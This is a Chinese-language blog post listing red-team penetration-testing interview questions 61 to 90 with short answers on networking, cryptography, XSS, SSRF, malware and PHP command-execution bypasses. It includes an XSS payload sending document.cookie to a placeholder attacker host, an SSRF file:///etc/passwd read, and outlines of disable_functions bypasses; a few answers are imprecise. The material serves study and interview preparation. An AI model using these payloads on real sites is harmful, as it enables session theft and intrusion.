2025年渗透测试面试题总结-渗透测试红队面试三(题目+回答)
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
渗透测试红队面试三
六十一、主机被入侵自查解决方案
六十二、NAT(网络地址转换)协议
六十三、内网穿透
六十四、虚拟专用网络(VPN)
六十五、二层交换机
六十六、路由技术
六十七、三层交换机
六十八、IPv6地址表示
六十九、对称加密与非对称加密
七十、同源策略
七十一、Cookie存储与访问
七十二、XSS盗取Cookie
七十三、TCP与UDP区别及SYN攻击
七十四、安全证书
七十五、DVWA搭建
七十六、渗透测试流程
七十七、XSS防御
七十八、IIS防护
七十九、虚拟机连接方式
八十、XSS与Cookie登录
八十一、JNI函数名转换
八十二、Frida与Xposed
八十三、SSRF利用
八十四、宏病毒
八十五、APP加壳
八十六、WannaCry特征
八十七、ARM32返回值与返回地址
八十八、HTTPS握手技术
八十九、PHP disable_functions绕过
九十、任意命令执行方式
渗透测试红队面试三
六十一、主机被入侵,你会如何处理这件事自查解决方案:六十二、 NAT(网络地址转换)协议六十三、内网穿透六十四、虚拟专用网络六十五、二层交换机六十六、路由技术六十七、三层交换机六十八、IPv6 地址表示六十九、对称加密非对称加密?七十、什么是同源策略?七十一、cookie 存在哪里?可以打开吗七十二、xss 如何盗取 cookie?七十三、tcp、udp 的区别及 tcp 三次握手,syn 攻击?七十四、证书要考哪些?七十五、DVWA 是如何搭建的?七十六、渗透测试的流程是什么七十七、xss 如何防御七十八、IIS 服务器应该做哪些方面的保护措施:七十九、虚拟机的几种连接方式及原理八十、xss 有 cookie 一定可以无用户名密码登录吗?八十一、 JNI 函数在 java 中函数名为 com.didi.security.main,C 中的函数名是什么样的?八十二、Frida 和 Xposed 框架?八十三、SSRF 利用方式?八十四、宏病毒?八十五、APP 加壳?八十六、勒索软件 Wanacry 的特征?蠕虫、僵尸病毒八十七、ARM32 位指令中,返回值和返回地址保存在哪个寄存器中?八十八、HTTPS 握手过程中用到哪些技术?八十九、Linux 中 PHP 环境,已知 disable_functions=exec,passthrupopen,proc_open,shell_exec,system,九十、请写出两种有可能实现任意命令执行的方式?
六十一、主机被入侵自查解决方案
- 隔离与止损
- 立即断开网络连接,阻断攻击者持续访问路径;备份当前系统状态(内存镜像、磁盘快照)用于取证。
- 禁用可疑账户,检查系统日志(如
/var/log/auth.log
或Windows事件查看器)定位异常登录记录。- 漏洞分析与修复
- 使用工具(如
rkhunter
、ClamAV
)扫描后门程序;比对文件哈希值识别篡改文件。- 修复已知漏洞,更新系统补丁,关闭非必要服务端口(如
netstat -ano
排查)。- 加固与监控
- 配置防火墙规则(如iptables/Windows防火墙)、启用IDS/IPS系统;部署HIDS(主机入侵检测系统)。
- 审计SSH密钥、口令策略;启用多因素认证(MFA)。
六十二、NAT(网络地址转换)协议
- 核心功能
- 解决IPv4地址短缺问题,通过映射内网私有IP到公网IP(如PAT实现端口复用)。
- 静态NAT(一对一映射)、动态NAT(地址池分配)、PAT(Port Address Translation,NAT Overload)。
- 应用场景
- 家庭路由通过NAT共享公网IP;企业内网隐藏真实拓扑结构。
- 局限性
- 破坏端到端透明性,导致P2P应用穿透困难(需STUN/TURN协议辅助)。
六十三、内网穿透
- 技术原理
- 反向代理(如Ngrok):公网服务器中转内网服务流量。
- 隧道技术(如SSH隧道、VPN):封装内网流量绕过防火墙。
- 典型工具
- Frp:支持TCP/UDP端口映射;ZeroTier:基于P2P的虚拟局域网。
- 安全风险
- 暴露内网服务可能引入攻击面(如未授权访问数据库)。
六十四、虚拟专用网络(VPN)
- 核心机制
- 加密隧道(IPsec/OpenVPN)保障数据机密性;支持远程访问内网资源。
- 协议对比
- IPsec(网络层加密,兼容性差)、SSL VPN(基于HTTPS,易穿透防火墙)。
- 企业应用
- 分支机构互联(Site-to-Site VPN);员工远程办公(Client-to-Site VPN)。
六十五、二层交换机
- 工作原理
- 基于MAC地址表转发帧,支持VLAN划分隔离广播域。
- 局限性
- 无法跨子网通信,需依赖路由器或三层交换机。
六十六、路由技术
- 路由类型
- 静态路由(手动配置)、动态路由协议(OSPF、BGP基于链路状态或路径矢量)。
- NAT与负载均衡
- 结合策略路由实现流量分流(如企业多出口场景)。
六十七、三层交换机
- 核心特性
- 集成路由功能(基于ASIC硬件加速),支持VLAN间路由。
- 应用场景
- 数据中心核心层实现高速路由转发。
六十八、IPv6地址表示
- 格式规则
- 8组16进制数(如
2001:0db8:85a3::8a2e:0370:7334
),省略前导零和连续零组。- 地址类型
- 单播(Global Unicast)、组播(Multicast)、链路本地(FE80::/10)。
六十九、对称加密与非对称加密
- 对称加密(AES)
- 加解密密钥相同,速度快,适合大数据量传输。
- 非对称加密(RSA)
- 公钥加密、私钥解密,解决密钥分发问题(如SSL证书交换)。
- 混合应用
- TLS握手阶段用RSA交换AES会话密钥。
七十、同源策略
- 定义
- 浏览器阻止跨域脚本访问其他源的DOM/Cookie(同源:协议+域名+端口一致)。
- 绕过机制
- CORS(服务端设置
Access-Control-Allow-Origin
)、JSONP(动态插入<script>
标签)。
七十一、Cookie存储与访问
- 存储位置
- 浏览器本地(Chrome:
chrome://settings/siteData
),受HttpOnly
标记限制脚本访问。- 安全风险
- 明文存储敏感信息可能被XSS窃取(需Secure+HttpOnly+SameSite防护)。
七十二、XSS盗取Cookie
- 攻击流程
- 注入
<script>document.location='http://attacker/?cookie='+document.cookie</script>
。- 防御措施
- 设置
HttpOnly
阻止JS读取Cookie;输入过滤与输出编码。
七十三、TCP与UDP区别及SYN攻击
- 协议对比
- TCP可靠传输(ACK确认、重传)、面向连接;UDP无连接、低延迟(适合音视频流)。
- 三次握手
- SYN→SYN-ACK→ACK;SYN攻击通过伪造源IP耗尽服务器半连接队列。
- 防御手段
- SYN Cookie机制(无状态验证)、限制并发半连接数。
七十四、安全证书
- 认证体系
- OSCP(渗透测试)、CISSP(安全管理)、CEH(道德黑客)。
- 技能方向
- 网络攻防(PNPT)、云安全(CCSP)、逆向工程(GREM)。
七十五、DVWA搭建
- 依赖环境
- LAMP/WAMP环境(PHP 5+、MySQL);配置
config.inc.php
设置数据库连接。- 漏洞配置
- 手动调整安全等级(Low/High)模拟不同难度场景。
七十六、渗透测试流程
- 阶段划分
- 信息收集(Whois、Nmap)、漏洞扫描(Nessus)、利用(Metasploit)、后渗透(权限维持)。
- 合规性
- 授权书(Scope定义)、规避法律风险(如避免DoS攻击)。
七十七、XSS防御
- 输入过滤
- 白名单校验(如仅允许字母数字);转义特殊字符(
<
→<
)。- CSP策略
- 响应头
Content-Security-Policy
限制脚本来源(如'self'
)。
七十八、IIS防护
- 加固措施
- 禁用WebDAV、关闭目录遍历;配置请求过滤规则(拒绝
../
路径)。- 日志审计
- 启用W3C日志记录,监控异常请求(如大量404错误)。
七十九、虚拟机连接方式
- 桥接模式
- 虚拟机直接接入物理网络,独立IP(类似独立主机)。
- NAT模式
- 共享宿主机IP,通过虚拟NAT设备进行地址转换。
八十、XSS与Cookie登录
- 条件限制
- 需目标站点会话仅依赖Cookie(无IP绑定/MFA);若Cookie标记Secure则需HTTPS劫持。
八十一、JNI函数名转换
- 命名规则
- C函数名格式:
Java_完整类名_方法名
(如Java_com_didi_security_main
),特殊字符用_1
转义。
八十二、Frida与Xposed
- Frida特性
- 动态插桩(D-Bus通信),支持跨进程Hook(如Android/iOS应用内存修改)。
- Xposed局限
- 需Root环境,基于模块化Hook框架(全局生效)。
八十三、SSRF利用
- 攻击向量
- 利用协议处理漏洞(如
file:///etc/passwd
、dict://
探测内网端口)。- 绕过技巧
- 域名重定向(短网址)、IPv6地址格式混淆。
八十四、宏病毒
- 传播方式
- 依附Office文档宏代码,利用社会工程诱导启用宏。
- 检测清除
- 禁用宏执行;使用杀毒软件扫描
*.docm
文件。
八十五、APP加壳
- 技术原理
- 加密DEX/ELF文件,运行时动态解密(如梆梆安全、UPX)。
- 对抗脱壳
- 反调试检测、多壳嵌套、代码混淆(OLLVM)。
八十六、WannaCry特征
- 传播方式
- 利用SMB漏洞(EternalBlue)横向扩散;加密文件扩展名(
.WNCRY
)。- 防御措施
- 关闭445端口;安装MS17-010补丁。
八十七、ARM32返回值与返回地址
- 寄存器分配
- 返回值:R0(32位)/R0-R1(64位);返回地址:LR(R14),函数退出时通过
BX LR
跳转。
八十八、HTTPS握手技术
- 密钥交换
- ECDHE算法生成临时密钥(前向保密);RSA验证证书链。
- 会话复用
- Session ID/Ticket减少握手开销。
八十九、PHP disable_functions绕过
- 未禁用函数利用
mail()
函数通过LD_PRELOAD
注入共享库;imagick
模块处理恶意图片触发命令。- 反序列化漏洞
- 利用
phar://
协议触发反序列化操作链(如GadgetChain
)。
九十、任意命令执行方式
- 环境变量注入
- 控制
PATH
变量指向恶意二进制(如echo /tmp > PATH
)。- 外部程序调用
- 利用
ImageMagick
处理漏洞(CVE-2016-3714)执行系统命令。